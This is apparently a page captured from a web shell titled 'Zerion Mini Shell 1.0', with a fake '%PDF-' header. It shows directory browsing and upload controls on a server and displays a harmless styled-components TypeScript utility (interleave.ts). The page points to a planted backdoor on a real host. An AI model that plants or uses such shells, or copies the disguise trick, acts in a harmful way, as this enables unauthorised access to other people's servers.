%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/emergentqj/actioncivile/pre-auth/.f81b4c9eb38fd76cdf20462cf2027aa3/static/node_modules/styled-components/src/utils/
Upload File :
Create Path :
Current File : /home/emergentqj/actioncivile/pre-auth/.f81b4c9eb38fd76cdf20462cf2027aa3/static/node_modules/styled-components/src/utils/interleave.ts

import { Interpolation } from '../types';

export default function interleave<Props extends object>(
  strings: readonly string[],
  interpolations: Interpolation<Props>[]
): Interpolation<Props>[] {
  const result: Interpolation<Props>[] = [strings[0]];

  for (let i = 0, len = interpolations.length; i < len; i += 1) {
    result.push(interpolations[i], strings[i + 1]);
  }

  return result;
}

Zerion Mini Shell 1.0